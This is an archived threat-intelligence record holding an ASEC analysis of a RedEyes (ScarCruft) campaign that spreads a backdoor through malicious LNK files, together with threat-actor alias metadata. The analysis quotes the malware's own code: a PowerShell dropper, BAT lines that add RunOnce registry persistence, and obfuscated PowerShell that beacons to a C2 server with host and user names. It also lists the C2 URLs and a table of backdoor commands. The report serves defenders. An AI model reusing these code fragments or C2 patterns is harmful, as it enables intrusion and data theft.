{
	"id": "c34a4391-a0d6-429f-8d00-5a3b1cc20da0",
	"created_at": "2026-04-06T00:21:21.435206Z",
	"updated_at": "2026-04-10T13:11:23.474122Z",
	"deleted_at": null,
	"sha1_hash": "95a9b62c3535d9bcf354344a050f2df6c1f5644a",
	"title": "Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2704414,
	"plain_text": "Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft)\r\n- ASEC\r\nBy ATCP\r\nPublished: 2023-08-31 · Archived: 2026-04-05 19:57:14 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously\r\ndistributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts\r\nlocated at a specific URL through the mshta process. It then receives commands from the threat actor’s server to\r\ncarry out additional malicious behaviors.\r\nThe threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside\r\nmalware within a compressed file.\r\nhttps://asec.ahnlab.com/en/56756/\r\nPage 1 of 7\n\nThe malicious LNK file has been uploaded under the file name ‘REPORT.ZIP.’ Similar to the malware identified\r\nin \u003cRokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)\u003e [2], this file has an\r\nLNK that contains normal Excel document data and malicious script code.\r\nTherefore, when the ‘Status Survey Table.xlsx.lnk’ file is executed, it creates and executes a normal document\r\ncalled ‘Status Survey Table.xlsx’ and the malicious script ‘PMmVvG56FLC9y.bat’ in the %Temp% folder through\r\nPowerShell commands.\r\n/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Progr\r\n‘Status Survey Table.xlsx’ appears as a normal Excel document and impersonates a Korean public organization in\r\nthe following manner.\r\nWhen the concurrently generated ‘PMmVvG56FLC9y.bat’ file is executed, it is copied into the\r\n‘%appdata%\\Microsoft\\Protect\\’ folder as ‘UserProfileSafeBackup.bat’. 
	Afterward, it is registered in the following\r\nregistry to ensure continuous execution of the BAT file.\r\nRegistry path: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nValue name: BackupUserProfiles\r\nValue: C:\\Windows\\SysWOW64\\cmd.exe /c %appdata%\\Microsoft\\Protect\\UserProfileSafeBackup.bat\r\nAfter registering to the above registry, a PowerShell command in hexadecimal format inside the BAT file is\r\nexecuted.\r\ncopy %~f0 \"%appdata%\\Microsoft\\Protect\\UserProfileSafeBackup.bat\"\r\nREG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v BackupUserProfiles /t REG_SZ /f /d \"C:\\Windows\r\nstart /min C:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command\r\n\"$m6drsidu =\"$jWHmcU=\"\"\"53746172742D536C656570202D\u003comitted\u003e\"\"\";$nj4KKFFRe=\"\"\"\"\"\";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));\";\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));\"\r\nWhen the PowerShell command is executed, a Run key registration is carried out alongside the execution of\r\nadditional scripts utilizing mshta. Furthermore, registry registrations can be performed through commands from\r\nthe threat actor. 
	The following is a portion of the PowerShell command represented in hexadecimal format within\r\nthe code of the BAT file.\r\nStart-Sleep -Seconds 67;\r\n$nvSklUbaQ = 1024 * 1024;\r\n$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';\r\n$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;\r\n$bLmoifqHwJxhE = $env:TEMP + '/KsK';\r\nif (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOn\r\nThe confirmed C2 and malicious URLs are as follows:\r\nhxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH //\r\nReceives commands from the threat actor\r\nhxxp://75.119.136.207/config/bases/config.php?R=[‘EOF’ encoded in base64] // Transmits command\r\nexecution results\r\nhxxp://bian0151.cafe24[.]com/admin/board/1.html // Downloads additional script codes\r\nThe additional script codes (hxxp://bian0151.cafe24.com/admin/board/1.html) executed through mshta contain a\r\nPowerShell command obfuscated in Base64 as shown below. This command performs functions similar to those\r\npreviously disclosed in Table 1 of the post \u003cRedEyes Group Wiretapping Individuals (APT37)\u003e [3].\r\nThe decoded PowerShell command receives and processes commands from the threat actor at\r\nhxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH. 
	Figure 6 shows a\r\nportion of the decoded PowerShell command.\r\nThe commands and features that can be performed are as follows.\r\nCommand Feature\r\npcinfo Collects PC information\r\ndrive Collects drive information\r\nclipboard Collects clipboard content\r\nsvc Collects service information\r\nprocess Collects information on running processes\r\nfileinfo Collects the names, sizes, last used dates, and complete paths for the subfiles in the received path\r\nstart Executes received command through cmd\r\nplugin Downloads and executes additional files through PowerShell\r\ndown Downloads additional files in the received path\r\nup Uploads files from the received path\r\nregedit Adds to the registry\r\ncompress Compresses files\r\nTable 1. Commands and features that can be performed\r\nIt is suspected that the attacker is continuously modifying the script code, as the commands listed in Table 1 differ\r\nfrom those previously identified. Therefore, in addition to the functionalities confirmed so far, various other\r\nmalicious activities may also be performed.\r\nAside from the LNK file, the compressed files ‘KB_20230531.rar’, ‘attachment.rar’, and\r\n‘hanacard_20230610.rar’ that were identified alongside ‘REPORT.ZIP’ in Figure 1, also contain the previously\r\nidentified malicious CHM file. Similar to the LNK file described earlier, this CHM file is malware that utilizes\r\nmshta to execute additional scripts located at specific URLs.\r\nDue to the recent mass distribution of malware utilizing CHM and LNK files, users need to exercise extra caution.\r\nIn the case of the malicious LNK files, it has been observed that a significant number of them have a file size\r\nexceeding 10 MB. 
	Therefore, users must refrain from executing large LNK files from unknown sources.\r\n[File Detection]\r\nDropper/LNK.Generic.S2241 (2023.04.24.02)\r\nTrojan/BAT.PsExec.S2247 (2023.06.13.02)\r\nDownloader/Script.Generic.SC191708 (2023.08.17.03)\r\n[Behavior Detection]\r\nDefenseEvasion/DETECT.T1059.M11294\r\nDefenseEvasion/DETECT.T1059.M11295\r\nMD5\r\n0eb8db3cbde470407f942fd63afe42b8\r\n27f74072d6268b5d96d73107c560d852\r\n2d444b6f72c8327d1d155faa2cca7fd7\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//75[.]119[.]136[.]207/config/bases/config[.]php\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/56756/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/56756/"
	],
	"report_names": [
		"56756"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434881,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.pdf",
		"text": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.txt",
		"img": "https://archive.orkl.eu/95a9b62c3535d9bcf354344a050f2df6c1f5644a.jpg"
	}
}